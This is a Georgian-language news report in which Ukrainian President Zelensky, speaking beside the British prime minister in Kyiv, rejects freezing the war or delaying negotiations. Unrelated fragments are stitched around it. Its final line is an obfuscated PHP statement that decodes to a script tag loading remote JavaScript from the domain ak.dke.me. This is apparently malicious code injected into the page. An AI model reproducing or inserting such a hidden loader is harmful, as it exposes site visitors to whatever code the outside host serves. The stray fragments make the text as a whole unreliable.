celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი აცხადებს, რომ არ შეიძლება ომის გაყინვაზე დათანხმება. აღნიშნულის შესახებ უკრაინის პრეზიდენტმა კიევში, უკრაინის დამოუკიდებლობის დღის აღსანიშნავად ჩასულ ბრიტანეთის მოქმედ პრემიერთან ერთად გამართულ პრესკონფერენციაზე განაცხადა.
 
როგორც უკრაინული მედია წერს, უკრაინის პრეზიდენტს დაუსვეს კითხვა, ხედავს თუ არა რისკს, რომ უახლოეს მომავალში, რუსული პროპაგანდისა და ენერგეტიკული შანტაჟის გავლენით, დასავლეთის მიდგომა რუსეთ-უკრაინის ომთან მიმართებით უკრაინის გამარჯვების აუცილებლობაზე საუბრიდან შეიცვლება რაიმე კომპრომისების პოვნისკენ.
 
„არ შეიძლება მოდუნება. არ შეიძლება კონფლიქტის გაყინვა. და არ შეიძლება იმის თქმა, რომ მოვიცადოთ ერთი, ორი, სამი წელი და დავიწყოთ საუბარი. ეს ყოველივე იქნება ჩვენი სისუსტე. არავითარ შემთხვევაში არ უნდა მივცეთ ინიციატივა ენერგეტიკული რისკებით, გათბობის სეზონით, ატომური შანტაჟით, შავი ზღვის ბლოკადით, შიმშილით და ა.შ. ბევრმა ქვეყანამ, ამ ყველაფრის გამო, შეიძლება, დაკარგოს ინიციატივა. უკრაინას არ აქვს უფლება, დაკარგოს ინიციატივა და არ უნდა დაუშვას, რომ ევროპამ დაკარგოს ინიციატივა. დღეს მთელმა მსოფლიომ წაართვა ინიციატივა რუსეთის ფედერაციას, ჩვენი გამარჯვება ამ ომში არის დიდი ერთობა და ამ ინიციატივის დაკარგვის შეუძლებლობა“, – აღნიშნა უკრაინის პრეზიდენტმა.
474
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");